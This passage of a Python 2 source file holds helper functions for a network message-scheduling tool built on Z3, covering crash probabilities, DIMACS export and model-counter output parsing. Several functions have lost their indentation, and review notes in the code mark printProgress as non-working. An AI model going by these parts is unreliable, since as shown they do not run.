    context's rounding to the result.
    """
    if precision is not None:
        with localcontext() as ctx:
            ctx.prec = precision # Perform a high precision calculation
            one = Decimal(1)
            e=Decimal(e)
            t=Decimal(t)
            p_crashes=Decimal(p_crashes)
            k_crashes=Decimal(k_crashes)
            a=(one-p_crashes)**((e-k_crashes)*t)*(p_crashes**k_crashes)
            b=(one-p_crashes)**(Decimal(k_crashes_sum))
            res = a*b
            res = +res  # round to the context precision
            return res
    else:
        # plain float path
        a=pow(1-p_crashes,(e-k_crashes)*t)*pow(p_crashes,k_crashes)
        b=pow(1-p_crashes,k_crashes_sum)
        return a*b
def get_crash_data(stng, mdl, t, M):
    """Collect (edge, time) pairs for each edge's first crash in model `mdl`.

    Only the earliest crash time per edge is recorded (the inner loop
    stops at the first true crash variable).
    """
    crashes = []
    for edge in stng.g.E:
        for step in range(t):
            if is_true(mdl[stng.vars.crash(edge, step)]):
                crashes.append((edge, step))
                break
    return crashes
def get_model_prob(stng, crash_model, t, M, p_crashes=0, k_crashes=0):
    """Probability weight of the specific crash pattern in `crash_model`.

    Sums the crash times from the model and delegates to prob_not_AMA.
    """
    crash_times = get_crash_data(stng, crash_model, t, M)
    time_sum = math.fsum(step for _, step in crash_times)
    return prob_not_AMA(len(stng.g.E), t,
                        p_crashes=p_crashes, k_crashes=k_crashes,
                        k_crashes_sum=time_sum)
def crashesProbability(stng,M,t,crashed=0,
    k_omissions=0,k_crashes=0,k_delays=0,
    p_omissions=0,p_crashes=0,p_delays=0,
    immediatefailure=None):
    '''
    Returns the probability that exactly k crashes/delays/omissions occur.

    Only crash faults are supported (checkSupport rejects the rest);
    `crashed` edges are excluded from the live-edge count.
    '''
    checkSupport(k_omissions=k_omissions, k_crashes=k_crashes, k_delays=k_delays)
    live_edges = len(stng.g.E) - crashed
    return prob_crash_parameters(
        live_edges, t,
        immediatefailure=immediatefailure,
        p_crashes=p_crashes, k_crashes=k_crashes)
######
# MISC
######
def save_scaling_data_to_file(run, params, rt_dat, prob, filename=None):
    """Pickle (run, params, rt_dat, prob) to a results file.

    The default filename is derived from the n/m/e/t/l entries of
    `params` (those keys are required even when `filename` is given).
    """
    n, m, e = params['n'], params['m'], params['e']
    t, l = params['t'], params['l']
    if filename is None:
        filename = 'results/n{}-m{}-e{}-t{}-l{}.dat'.format(n, m, e, t, l)
    save_to_file((run, params, rt_dat, prob), filename)
def save_counting_parameters(n, m, e, t, k, l, result):
    """Append one tab-separated timing record to the counting log file."""
    record = "{}\t{}\t{}\t{}\t{}\t{}\t{}\n".format(n, m, e, t, k, l, result)
    with open("timings_counting_bitadder.txt", "a") as log:
        log.write(record)
def AskContinue(lb,ub,k):
    """Report the current probability bounds and decide whether to iterate.

    Returns True while the uncertainty (ub - lb) is still >= 0.01.

    NOTE(review): the final `return query_yes_no(...)` is unreachable —
    the numeric check above always returns first.  It looks like a
    deliberate override of the interactive prompt; confirm before
    removing.
    """
    print "Probability lies in ({},{})".format(lb,ub)
    print "Uncertainity = {}".format(ub-lb)
    ques="Do you want to continue with k={}".format(k)
    print ques
    return (ub-lb)>=0.01
    return query_yes_no(ques,default="yes")
# Ref : http://code.activestate.com/recipes/577058/
def query_yes_no(question, default="yes"):
    """Ask a yes/no question via raw_input() and return their answer.

    "question" is a string that is presented to the user.
    "default" is the presumed answer if the user just hits <Enter>.
    It must be "yes" (the default), "no" or None (meaning
    an answer is required of the user).

    The "answer" return value is True for "yes" or False for "no".
    Loops until a valid answer (or an empty line with a default) is given.
    """
    valid = {"yes": True, "y": True, "ye": True,
             "no": False, "n": False}
    # Choose the prompt suffix; the capital letter marks the default.
    if default is None:
        prompt = " [y/n] "
    elif default == "yes":
        prompt = " [Y/n] "
    elif default == "no":
        prompt = " [y/N] "
    else:
        raise ValueError("invalid default answer: '%s'" % default)
    while True:
        # sys.stdout.write(question + prompt)
        choice = raw_input(question + prompt).lower()
        # print(choice)
        if default is not None and choice == '':
            return valid[default]
        elif choice in valid:
            return valid[choice]
        else:
            sys.stdout.write("Please respond with 'yes' or 'no' "
                             "(or 'y' or 'n').\n")
def parse_arguments():
    """Build the optparse command-line parser and parse sys.argv.

    Positional arguments (nodes, messages, edges, timeout, l, k) are
    documented in help(); the commented-out add_option calls below are
    their abandoned option-style predecessors.

    Returns:
        (options, args) as produced by OptionParser.parse_args().
    """
    usage = "usage: %prog [options] nodes messages edges timeout l k"
    parser = OptionParser(usage=usage)
    # parser.add_option('-t','--timeout', dest="t",
    # 	help="The timeout, should be an integer")
    # parser.add_option("-l", dest="l",
    # 	help="The guarantee on the number of messages that should arrive.")
    # parser.add_option("-k", dest="k",
    # 	help="#edges that are allowed to crash.")
    # parser.add_option("-n", dest="n",
    # 	help="#vertices in the network.")
    # parser.add_option("-m", dest="m",
    # 	help="#messages in the network.")
    # parser.add_option("-e", dest="e",
    # 	help="#edges in the network.")
    parser.add_option("-l","--load",
        action="store_true", dest="load", default=False,
        help="Load setting from pickle-dumped file 'settings.curr'")
    parser.add_option("-m","--manual","--custom",
        action="store_true", dest="custom", default=False,
        help="Load setting from custom file 'custom.settings'")
    parser.add_option("-b","--brute",
        action="store_false", dest="optimize", default=True,
        help="Dont Optimize")
    parser.add_option("-v","--verbose",
        action="store_true", dest="showProgress", default=False,
        help="Dont show progress")
    parser.add_option("--nw","--no-weight",
        action="store_false", dest="weight", default=True,
        help="Choose paths without weights")
    parser.add_option("-d","--no-diff",
        action="store_true", dest="diff", default=False,
        help="Check if schedules generated are different")
    parser.add_option("-c","--count",
        action="store_true", dest="countFaults", default=False,
        help="Count the numer of BAD outcomed fault sequences with at most k crashes")
    parser.add_option("-p","--prob",
        action="store_true", dest="probabalistic", default=False,
        help="Score the forwarding scheme that is generated for the setting")
    return parser.parse_args()
def clearFolder(folder):
    """Delete *folder* (recursively) and recreate it empty.

    The original built "rm -r <folder>" / "mkdir <folder>" strings and
    ran them with shell=True, which breaks on paths containing spaces
    or shell metacharacters and is injection-prone.  Passing argument
    lists with shell=False fixes both while keeping the same external
    commands (return codes are still ignored, as before).
    """
    subprocess.call(["rm", "-r", folder])
    subprocess.call(["mkdir", folder])
def save_to_file(S, filename):
    """Pickle object *S* to *filename*.

    Opens in binary mode ('wb'): pickle data is bytes, and the original
    text-mode 'w' corrupts the stream under newline translation (and is
    a hard error on Python 3).  The context manager also guarantees the
    handle is closed even if dump() raises.
    """
    with open(filename, 'wb') as f:
        pickle.dump(S, f)
def load_from_file(filename):
    """Unpickle and return the object stored in *filename*.

    Opens in binary mode ('rb') — pickle data is bytes — and closes the
    handle via a context manager (the original leaked the open file).
    """
    with open(filename, 'rb') as f:
        return pickle.load(f)
def save_priority_to_file(stng, pr, filename):
pr_dict = {}
for v in stng.g.V:
pr_dict[str(v)] = []
for m in pr[v]:
pr_dict[str(v)].append(str(m))
print pr_dict
save_to_file(pr_dict, filename)
def load_priority_from_file(stng, M, filename):
    """Inverse of save_priority_to_file: rebuild vertex -> message lists.

    Message names are interpreted as integer indices into M.
    """
    name_map = load_from_file(filename)
    priorities = {}
    for vertex in stng.g.V:
        priorities[vertex] = [M[int(name)] for name in name_map[str(vertex)]]
    return priorities
def getModel(s):
    """Return the solver's model when satisfiable, otherwise False."""
    return s.model() if s.check() == sat else False
def checkSupport(k_omissions=0, k_crashes=0, k_delays=0):
    """Guard: only crash faults are implemented.

    Raises:
        ValueError: if any omission or delay faults are requested.

    The original used a bare `raise` with no active exception, which
    itself blows up with RuntimeError("No active exception to re-raise");
    an explicit, descriptive error is strictly clearer.
    """
    if k_delays > 0:
        raise ValueError("delay faults are not supported (k_delays=%d)" % k_delays)
    if k_omissions > 0:
        raise ValueError("omission faults are not supported (k_omissions=%d)" % k_omissions)
def GeneratePriorities(stng, mdl, M):
    '''
    Extract message priorities from a solver model.

    For every vertex v, priorities[v] lists the messages in descending
    priority order (rank 0 first).  A falsy model is passed through
    unchanged.
    '''
    if not mdl:
        return mdl
    priorities = {vertex: [] for vertex in stng.g.V}
    for msg in M:
        for vertex in stng.UFSv[msg]:
            for rank in range(len(M)):
                if is_true(mdl[stng.vars.priority(msg, vertex, rank)]):
                    priorities[vertex].append((rank, msg))
    for vertex in stng.g.V:
        ranked = sorted(priorities[vertex], key=lambda pair: pair[0])
        priorities[vertex] = [msg for _, msg in ranked]
    return priorities
def getEdgePriorities(g, FCv, UFSv, M):
    '''
    Build per-(message, vertex) edge-priority lists from the first and
    second paths: edge_priority[m][v][0] is the first-path edge (when v
    lies on the first path), edge_priority[m][v][1] the second-path edge.
    '''
    edge_priority = {}
    for msg in M:
        edge_priority[msg] = {vertex: [] for vertex in g.V}
        # first-choice path edges come first in each list
        for vertex in FCv[msg]:
            edge = g(vertex, vertex.nextF(msg))
            if edge is not None:
                edge_priority[msg][vertex].append(edge)
        # then the second-path edges
        for vertex in UFSv[msg]:
            edge = g(vertex, vertex.nextS(msg))
            if edge is not None:
                edge_priority[msg][vertex].append(edge)
    return edge_priority
# Ref : https://rosettacode.org/wiki/Decimal_floating_point_number_to_binary#Python
def float_dec2bin(d, max_len = 25):
    """Binary-fraction expansion of a decimal d in (0, 1).

    Returns (bit_string, exp) where exp == len(bit_string) and the value
    is the binary fraction 0.<bit_string>.  At most max_len bits are
    kept (trailing zeros stripped after truncation).  Results are
    memoized in glbl_vars.float_dec2bin_dict.
    """
    d = float(d)
    assert d>0 and d<1
    if d in glbl_vars.float_dec2bin_dict.keys():
        return glbl_vars.float_dec2bin_dict[d]
    # float.hex() gives '0x1.<mantissa>p-<exp>'; translate each hex
    # mantissa digit to 4 bits via the glbl_vars.hex2bin table.
    hx = float(d).hex()
    p = hx.index('p')
    bn = ''.join(glbl_vars.hex2bin.get(char, char) for char in hx[2:p])
    bin_string = bn.strip('0')
    # hx[p+2:] skips 'p-' — valid because d < 1 makes the exponent negative
    exp = int(hx[p+2:])
    assert exp>=len(bin_string.split('.')[0])
    # absorb the exponent into leading zeros of the fraction
    prefix = ''.join(['0' for i in range(exp-len(bin_string.split('.')[0]))])
    bin_string = prefix + bin_string.split('.')[0] + bin_string.split('.')[1]
    if len(bin_string) > max_len:
        bin_string = bin_string[:max_len].rstrip('0')
    exp = len(bin_string)
    glbl_vars.float_dec2bin_dict[d] = (bin_string,exp)
    return bin_string,exp
def reduce_precision(p, precision):
    """Round probability p to `precision` binary digits.

    0 and 1 pass through unchanged; otherwise the value is rebuilt from
    the (truncated) binary expansion produced by float_dec2bin.
    """
    if p == 0:
        return 0
    if p == 1:
        return 1
    bits, exponent = float_dec2bin(p, max_len=precision)
    value = 0
    scale = 1
    for idx in range(exponent):
        scale /= 2.0
        if bits[idx] == '1':
            value += scale
    return value
def excludeCrashModel(stng,s,crash_model,t,add_crashes=False,at_t_only=False,
    omissions=False,crashes=False,delays=False):
    """Constrain solver `s` relative to the fault pattern in `crash_model`.

    Builds the conjunction of literals that exactly describes the
    selected fault families (omissions/crashes/delays) of `crash_model`
    over the time window, then either asserts it (add_crashes=True:
    force the same pattern) or asserts its negation (exclude this
    pattern from future models).

    at_t_only restricts the window to the single step `t`; otherwise
    the window is [0, t).
    """
    if at_t_only:
        begin_time=t
        end_time=t+1
    else:
        begin_time=0
        end_time=t
    exclude_crashes = []
    for e in stng.g.E:
        for i in range(begin_time,end_time):
            assert ((at_t_only is False) or (i==t))
            # omissions
            if omissions:
                if is_true(crash_model[stng.vars.omit(e,i)]):
                    exclude_crashes.append(stng.vars.omit(e,i))
                else:
                    exclude_crashes.append(Not(stng.vars.omit(e,i)))
            # crashes
            if crashes:
                if is_true(crash_model[stng.vars.crash(e,i)]):
                    exclude_crashes.append(stng.vars.crash(e,i))
                else:
                    exclude_crashes.append(Not(stng.vars.crash(e,i)))
            # delays
            if delays:
                if is_true(crash_model[stng.vars.delay(e,i)]):
                    exclude_crashes.append(stng.vars.delay(e,i))
                else:
                    exclude_crashes.append(Not(stng.vars.delay(e,i)))
    if add_crashes:
        s.add(And(exclude_crashes))
    else:
        s.add(Not(And(exclude_crashes)))
def help():
    """Print command-line usage for ScheduleTwoPathCEGAR.py.

    NOTE(review): shadows the builtin help(); consider renaming.
    """
    print '''
USAGE:
$ python ScheduleTwoPathCEGAR.py n m e t l k [options]
n Number of Nodes
m Number of Messages
e Number of Edges
t Global timeout
l The minimum number of messages that should reach on time
k The number of edge crashes (Not relevent for scoring forwarding schemes with option --prob)
OPTIONS:
--prob -p Score the forwarding scheme that is generated for the setting
--count -c Count the numer of BAD outcomed fault sequences with at most k crashes
--load -l Load setting from pickle-dumped file 'settings.curr'
--manual -m Load setting from custom text file 'custom.setting'. Explained in detail later
--custom The same as --manual
'''
##########
# PRINTING
##########
def print_dict(d,prefix=''):
    """Recursively pretty-print a nested structure with tab indentation.

    EAFP dispatch: tries dict access (.keys) first, then generic
    iteration, and finally prints the value as a scalar.  `prefix`
    carries the accumulated indentation.
    """
    try:
        for key in d.keys():
            print prefix+str(key),'=> ('
            print_dict(d[key],prefix=prefix+'\t')
            print prefix+')'
    except AttributeError:
        # not a dict — try to enumerate it as a sequence
        try:
            for i,val in enumerate(d):
                print prefix+str(i),'=> ('
                print_dict(val,prefix=prefix+'\t')
                print prefix+')'
        except TypeError:
            # not iterable — print the leaf value
            print prefix+str(d)
def print_edges(stng):
print ''
print ''
for i in range(len(stng.g.E)):
print 'edge',i, str(stng.g.E[i])
print ''
print ''
def print_priorities(stng,M):
'''
print edge priorities
'''
for m in M:
print "Message " + str(m) + " :: {}-->{}".format(str(m.s),str(m.t))
print "------------\n"
for v in stng.UFSv[m]:
print "\tvertex : " + str(v)
for e in stng.edge_priority[m][v]:
print "\t\tEdge "+str(e)
def print_message_priorities(stng,mdl,M):
'''
print edge priorities
'''
pr = GeneratePriorities(stng,mdl,M)
print "\nMESSAGE PRIORITIES"
print "------------------"
for v in stng.g.V:
print "Vertex : " + str(v)
for m in pr[v]:
print "\tMessage "+str(m)
def printProgress(stng, S, M, t, l, k):
    """Binary-search the largest arrival guarantee the schedule resists.

    NOTE(review): this function appears broken/dead as written:
      * it calls itself with keyword args (k_omissions, k_crashes,
        k_delays, returnSolver) that are neither parameters nor defined
        locally — a NameError at runtime — and expects a (model, solver)
        pair back, which this signature cannot produce;
      * `S` and `k` are otherwise unused.
    Kept byte-for-byte; confirm intent before repairing.
    """
    low = 0
    high = l
    rest = 0
    mid = (high + low)/2
    mdl,s = printProgress(stng, S, M, t, mid,
        k_omissions=k_omissions, k_crashes=k_crashes, k_delays=k_delays, returnSolver=True)
    while low < high:
        #redundant: print 'print progress start iteration', time.time()
        if mdl is False:
            low = mid+1
            rest = mid
        else:
            high = mid-1
        mid = (high + low)/2
        s.pop()
        s.push()
        # require fewer than `mid` messages delivered, then re-check
        s.add(Sum([If(stng.vars.config(m.t, m, t), 1, 0) for m in M]) < mid)
        if s.check() == sat:
            print mid
            #redundant: printCounterexample(stng, s.model(), t, M)
            mdl = True
        else:
            rest = mid
            mdl = False
    #redundant: print 'The schedule is (%d, %d)-resistant'%(rest, k)
def printMessagesInfo(stng, M):
for m in M:
print m.id, '%s --> %s'%(m.s, m.t)
print ', '.join([str(v) for v in stng.FCv[m]])
print ', '.join(['%s --> %s'%(str(v), str(v.nextS(m))) for v in stng.UFSv[m]])
print '################'
lengths = [len(stng.FCe[m]) for m in M]
print 'max length = ', max(lengths), "min length = ", min(lengths)
def printConfiguration(stng, crash_model, t, M, i):
for m in M:
for v in stng.UFSv[m]:
if is_true(crash_model[stng.vars.config(m,v,i)]):
print "{} at vertex {} at time {}".format(m,v,i)
def printConfigurations(stng, crash_model, t, M):
for i in range(t):
print "TIME {}".format(i)
printConfiguration(stng, crash_model, t, M, i)
def printCounterexample(stng, mdl, t, M,count=False):
    """Print (or count) the faults present in solver model `mdl`.

    With count=False each fault is printed; with count=True nothing is
    printed and a tuple (k_omissions, k_crashes, k_delays) is returned.
    Crashes are counted at most once per edge (break after the first
    crash time); omissions and delays are counted per (edge, time).
    """
    k_crashes=0
    k_omissions=0
    k_delays=0
    for e in stng.g.E:
        for i in range(t):
            if is_true(mdl[stng.vars.omit(e,i)]):
                if count is False:
                    print 'edge: %s omitted at time %d'%(str(e), i)
                else:
                    k_omissions += 1
    for e in stng.g.E:
        for i in range(t):
            if is_true(mdl[stng.vars.crash(e,i)]):
                if count is False:
                    print 'edge: %s crashed at time %d'%(str(e), i)
                    break
                else:
                    k_crashes += 1
                    break
    for e in stng.g.E:
        for i in range(t):
            if is_true(mdl[stng.vars.delay(e,i)]):
                if count is False:
                    print 'edge: %s delayed at time %d'%(str(e), i)
                else:
                    k_delays += 1
    if count is True:
        return (k_omissions,k_crashes,k_delays)
def print_time(msg,update=True):
new_time = time.time()
if update:
print msg,new_time,new_time-glbl_vars.last_time
glbl_vars.last_time = new_time
else:
print msg,new_time
return new_time
#############
# DEFINE VARS
#############
def definePriorityVariables(stng, M, heuristic=None, basic_names=False):
    '''
    Declare the boolean "message m has rank j at vertex v" variables.

    When `heuristic` is given, additionally build and return a dict of
    z3 Int variables pr[m][v] for the heuristic encoding; otherwise
    returns None.
    '''
    for msg in M:
        for vertex in stng.UFSv[msg]:
            # one boolean per candidate rank of msg at this vertex
            for rank in range(len(M)):
                stng.vars.def_priority(msg, vertex, rank, basic_names=basic_names)
    if heuristic is None:
        return None
    pr = {}
    for msg in M:
        pr[msg] = {}
        for vertex in stng.UFSv[msg]:
            pr[msg][vertex] = Int('priority of {} at vertex {}'.format(str(msg), str(vertex)))
    return pr
def defineSimulationVariables(stng, M, t, basic_names=False):
    '''
    Initiate/Define the following variables for simulating network:
        -configuration variables (message at vertex at time, over t+1 steps)
        -used variables (message uses edge at time)
        -message arrival variables
        -crash variables
        -delay variables
        -omission variables
    Declarations are registered on stng.vars; nothing is returned.
    '''
    for m in M:
        for v in stng.UFSv[m]:
            # is message m at vertex v at time i
            for i in range(t+1):
                stng.vars.def_config(m,v,i,basic_names=basic_names)
            for e in stng.edge_priority[m][v]:
                for i in range(t):
                    # is message m using e at i
                    stng.vars.def_used(m,e,i,basic_names=basic_names)
        # has message arrived destination
        stng.vars.def_msgArrive(m)
    for e in stng.g.E:
        for i in range(t):
            # Is there an omission fault at e at time i
            stng.vars.def_omit(e,i,basic_names=basic_names)
            # Is there a crash fault at e at time i
            stng.vars.def_crash(e,i,basic_names=basic_names)
            # Is there a delay fault at e at time i
            stng.vars.def_delay(e,i,basic_names=basic_names)
#########
# BOOLEAN
#########
def new_chain_formula(bit_str):
    """Fold fresh boolean variables into an Or/And chain driven by bit_str.

    The last character only seeds the first fresh variable; each earlier
    character then wraps one more fresh variable — '1' with Or, '0' with
    And.  Any other character (or an empty string) triggers the original
    bare `raise`.
    """
    if not bit_str:
        raise  # matches the original's bare raise on empty input
    formula = new_unused_variable()
    for bit in reversed(bit_str[:-1]):
        if bit == '1':
            formula = Or(formula, new_unused_variable())
        elif bit == '0':
            formula = And(formula, new_unused_variable())
        else:
            raise
    return formula
def new_unused_variable():
    """Return a fresh z3 Bool with a globally unique generated name."""
    fresh = Bool('new_var' + str(glbl_vars.variable_number))
    glbl_vars.variable_number += 1
    return fresh
########
# DIMACS
########
def cnf_to_DIMACS(cnf, record_wv_mapping=False):
    '''
    Translate a z3 CNF clause list into DIMACS integer clauses.

    Resets the global variable-numbering state (glbl_vars.init) first,
    then converts each clause via clause_to_DMACS.
    '''
    glbl_vars.init()
    return [clause_to_DMACS(clause, record_wv_mapping=record_wv_mapping)
            for clause in cnf]
def clause_to_DMACS(clause, record_wv_mapping=False):
    """Convert one clause's string form ("Or(a, b, ...)" or a single
    literal) to a list of signed DIMACS literal numbers."""
    text = str(clause)
    if text[:3] == "Or(":
        text = text[3:-1]
    return [literal_to_number(literal, record_wv_mapping=record_wv_mapping)
            for literal in text.split(",")]
def literal_to_number(literal, record_wv_mapping=False):
    """Map a (possibly negated) literal name to its signed DIMACS number.

    New names are assigned the next free number and remembered in
    glbl_vars.variable_name_to_number; names starting with "WV_" are
    additionally recorded (once, enforced by the assert) in
    glbl_vars.weight_vars_to_number when record_wv_mapping is set.
    """
    literal = literal.strip(" \t\n")
    negated = False
    if len(literal) > 5 and literal[:4] == "Not(":
        literal = literal[4:-1].strip(" \t\n")
        negated = True
    try:
        lit_num = glbl_vars.variable_name_to_number[literal]
    except KeyError:
        # first sighting: allocate a fresh number
        lit_num = glbl_vars.variable_number
        glbl_vars.variable_number += 1
        glbl_vars.variable_name_to_number[literal] = lit_num
        if record_wv_mapping:
            if literal[:3] == "WV_":
                assert not (literal[3:] in glbl_vars.weight_vars_to_number.keys())
                glbl_vars.weight_vars_to_number[literal[3:]] = lit_num
                # print 'Set WV -> '+literal[3:]
    return -1 * lit_num if negated else lit_num
def save_DIMACS_to_file(dimacs, filename, weight_vars=None, magnification=1):
    """Write a DIMACS CNF file, optionally with 'w <lit> <weight>' lines.

    For each weight variable wv the positive literal gets wv.weight and
    the negative literal magnification - wv.weight; every remaining
    variable gets weight 1 on both phases.  Variable numbering comes
    from the glbl_vars counters populated by cnf_to_DIMACS.
    """
    num_vars = glbl_vars.variable_number-1
    num_clauses = len(dimacs)
    with open(filename, "w") as f:
        header = "p cnf {} {}\n".format(num_vars,num_clauses)
        f.write(header)
        f.write(''.join([format_DIMACS_clause(clause) for clause in dimacs]))
        if weight_vars:
            weight_vars_data = []
            lit_weights_written = []
            for wv in weight_vars:
                try:
                    lit_num = glbl_vars.weight_vars_to_number[wv.name]
                    # if wv.weight == 0:
                    # 	weight_vars_data.append('{} 0\n'.format(-1*lit_num))
                    # else:
                    weight_vars_data.append('w {} {}\n'.format(lit_num,wv.weight))
                    # if wv.weight == 1:
                    # 	weight_vars_data.append('{} 0\n'.format(lit_num))
                    # else:
                    weight_vars_data.append('w {} {}\n'.format(-1*lit_num,magnification-wv.weight))
                    lit_weights_written.append(lit_num)
                except:
                    # NOTE(review): except-and-reraise is a no-op wrapper
                    raise
            # default weight 1/1 for every variable without an explicit weight
            for lit_num in [item for item in range(1,num_vars+1) if item not in lit_weights_written]:
                weight_vars_data.append('w {} {}\n'.format(lit_num,1))
                weight_vars_data.append('w -{} {}\n'.format(lit_num,1))
            f.write(''.join(weight_vars_data))
    print ''
    print "num_vars =",num_vars
    print "num_clauses =",num_clauses
    print ''
def format_DIMACS_clause(clause):
    """Render one DIMACS clause: space-separated literals, 0-terminated."""
    return ' '.join(str(literal) for literal in clause) + " 0\n"
########
# WMC
########
def process_approxMC_output(sol_file):
    """Parse an approxMC solution file and return the model count.

    Returns 0 for UNSAT, the parsed count for a "Number of solutions"
    line of the form "<a> x <b>^<c>" (= a * b**c), or the string
    'error' when neither line is found.
    """
    numSols = None
    with open(sol_file, "r") as f:
        status = 0  # NOTE(review): unused
        for line in f:
            if line=="The input formula is unsatisfiable.\n":
                numSols=0
                break
            elif line[:24]=="Number of solutions is: ":
                print line[24:-1]
                # format: "<a> x <b>^<c>"  =>  a * b**c
                expr = line[24:-1].split('x')
                num1 = int(expr[0])
                num2 = int(expr[1].split('^')[0])
                num3 = int(expr[1].split('^')[1])
                numSols = num1*(num2**num3)
        if numSols is None:
            # NOTE(review): the file has been fully consumed at this point,
            # so f.read() is '' and the diagnostic is always empty; also
            # assumes `sys` is imported at module level — confirm.
            sys.stderr.write('\n\n'+f.read()+'\n\n')
            return 'error'
    return numSols
def process_sharpSat_output(sol_file,return_time=False):
    """Parse sharpSAT output with a small line-by-line state machine.

    Expected layout: "# solutions" header, the count, "# END", a blank
    line, then "time: <seconds>s".  Returns the integer count, or
    (count, time_taken) when return_time is set; asserts on any
    deviation from the expected format.
    """
    numSols = None
    time_taken=None
    with open(sol_file, "r") as f:
        status = 0
        for line in f:
            if status == 0:
                # waiting for the "# solutions" header
                if line=="# solutions \n":
                    status += 1
            elif status == 1:
                numSols = int(line)
                status += 1
            elif status == 2:
                assert line=="# END\n"
                status += 1
            elif status == 3:
                assert line =="\n"
                status+=1
            elif status == 4:
                assert line[:6]=="time: "
                time_taken=float(line[6:-2])  # strip "time: " and trailing "s\n"
                status+=1
            else:
                break
    assert (status==5)
    assert numSols is not None
    assert time_taken is not None
    if return_time:
        return numSols,time_taken
    else:
        return numSols
def process_weightMC_output(sol_file):
    """Parse a weightMC solution file and return the weighted count.

    Returns 0 for UNSAT, the parsed float for an "Approximate weighted
    model count" line of the form "<a> x <b>^<c>" (= a * b**c), or the
    string 'error' when neither line is found.
    """
    numSols = None
    with open(sol_file, "r") as f:
        for line in f:
            if line=="The input formula is unsatisfiable.\n":
                numSols=0
                break
            elif line[:34]=='Approximate weighted model count: ':
                print line[34:-1]
                # format: "<a> x <b>^<c>"  =>  a * b**c (floats)
                expr = line[34:-1].split('x')
                num1 = float(expr[0])
                num2 = float(expr[1].split('^')[0])
                num3 = float(expr[1].split('^')[1])
                numSols = num1*(num2**num3)
        if numSols is None:
            # NOTE(review): f is already exhausted, so f.read() is '' —
            # the diagnostic is always empty; assumes `sys` is imported.
            sys.stderr.write('\n\n'+f.read()+'\n\n')
            return 'error'
    return numSols
def set_weight_vars(stng, s, M, t,precision=0,
    p_omissions=0,p_crashes=0,p_delays=0,magnification=1,output_range = None):
    """Add weighted indicator variables for fault events to the Z3 solver `s`.

    For every edge e and time step i, creates weight_var objects tied (via
    equality constraints) to omission/crash indicator formulas, so a weighted
    model counter can attach probabilities p_omissions / p_crashes to them.

    :param stng: settings object; stng.g.E is the edge list, stng.vars the
                 Z3 variable factory (used_ex / omit / crash).
    :param s: Z3 solver to add constraints to.
    :param M: list of messages.
    :param t: number of time steps.
    :param precision: passed to reduce_precision when rounding probabilities.
    :param magnification: scale factor applied to all weights (see below).
    :param output_range: if given, magnification is derived so the normalized
                         count lands in the requested range.
    :returns: (weight_vars, normalization_factor) or, when output_range is
              given, (weight_vars, normalization_factor, magnification).
    """
    normalization_factor = 1
    weight_vars = []
    # Each event contributes weight p (event happened) or 1/(2-p) (did not),
    # both rounded to `precision`.
    p_omissions1 = reduce_precision(p_omissions,precision)
    p_omissions2 = reduce_precision(1/(2-p_omissions),precision)
    p_crashes1 = reduce_precision(p_crashes,precision)
    p_crashes2 = reduce_precision(1/(2-p_crashes),precision)
    if output_range is not None:
        # Derive a magnification so that output_range * normalization lands
        # near 1: solve (output_range*original_norm) * mag^mag_count == 1.
        original_norm = 1
        mag_count = 0
        if p_omissions>0:
            original_norm *= ((1-p_omissions1)*p_omissions2)**(len(stng.g.E)*t)
            mag_count += len(stng.g.E)*t
        if p_crashes>0:
            original_norm *= ((1-p_crashes1)*p_crashes2)**(len(stng.g.E)*(t-1))
            mag_count += len(stng.g.E)*(t-1)
        magnification = (output_range*original_norm)**(-1.0/mag_count)
        print output_range, original_norm, mag_count, magnification
        p_omissions1 = p_omissions1*magnification
        p_omissions2 = p_omissions2*magnification
        p_crashes1 = p_crashes1*magnification
        p_crashes2 = p_crashes2*magnification
    for e in stng.g.E:
        for i in range(t):
            if p_omissions>0:
                # Omission weight variables: omit1 fires when the edge is
                # used by some message AND omitted; omit2 when neither holds.
                ors= []
                for m in M:
                    ors.append(stng.vars.used_ex(m,e,i))
                used = Or(ors)
                omit1 = weight_var(glbl_vars.variable_number,p=p_omissions1)
                glbl_vars.variable_number+=1
                omit2 = weight_var(glbl_vars.variable_number,p=p_omissions2)
                glbl_vars.variable_number+=1
                weight_vars.append(omit1)
                weight_vars.append(omit2)
                s.add(And(used,stng.vars.omit(e,i)) == omit1.var)
                s.add(And(Not(used),Not(stng.vars.omit(e,i))) == omit2.var)
                normalization_factor *= (magnification-p_omissions1)*p_omissions2
            if p_crashes>0:
                # Crash weight variables: crash1 marks the step the crash
                # starts; crash2 marks steps where it persists.
                if i==0:
                    crash1 = weight_var(glbl_vars.variable_number,p=p_crashes1)
                    glbl_vars.variable_number+=1
                    weight_vars.append(crash1)
                    s.add(crash1.var == stng.vars.crash(e,i))
                else:
                    crash1 = weight_var(glbl_vars.variable_number,p=p_crashes1)
                    glbl_vars.variable_number+=1
                    crash2 = weight_var(glbl_vars.variable_number,p=p_crashes2)
                    glbl_vars.variable_number+=1
                    weight_vars.append(crash1)
                    weight_vars.append(crash2)
                    s.add(crash1.var == And(stng.vars.crash(e,i),Not(stng.vars.crash(e,i-1))))
                    s.add(crash2.var == And(stng.vars.crash(e,i),(stng.vars.crash(e,i-1))))
                    normalization_factor *= (magnification-p_crashes1)*p_crashes2
    if output_range is not None:
        return weight_vars,normalization_factor,magnification
    else:
        return weight_vars,normalization_factor
def wieghted_to_unweighted(stng,s,weight_vars,t,
    p_omissions=0,p_crashes=0,p_delays=0):
    """Reduce a weighted model-counting instance to an unweighted one.

    Each weight_var's probability is expanded to a binary fraction and
    encoded as a chain formula, so an unweighted counter (e.g. sharpSAT)
    can be used; the result must be divided by the returned denominator.
    Fault kinds with probability <= 0 are clamped to "never happen".

    NOTE: the function name keeps its historical typo ("wieghted") because
    existing callers depend on it.

    :returns: denom, the product of 2**expo over all weight variables.
    """
    assert p_delays == 0
    denom = 1
    # Disable fault variables whose probability is zero (or negative).
    if p_omissions<=0:
        for e in stng.g.E:
            s.add(Not(Or([stng.vars.omit(e,i) for i in range(t)])))
    if p_crashes<=0:
        for e in stng.g.E:
            s.add(Not(Or([stng.vars.crash(e,i) for i in range(t)])))
    if p_delays<=0:
        for e in stng.g.E:
            s.add(Not(Or([stng.vars.delay(e,i) for i in range(t)])))
    for wv in weight_vars:
        # weight = bits / 2**expo; tie wv.var to a chain formula whose
        # satisfying-assignment fraction equals that binary fraction.
        (bits,expo) = float_dec2bin(wv.weight)
        cf = new_chain_formula(bits)
        s.add(wv.var == cf)
        denom *= 2**expo
    return denom
def vaildate_exit_code(exit_code):
    """Return True iff exit_code is an accepted solver exit status.

    0 is the usual success code; 10/20 are the conventional SAT/UNSAT exit
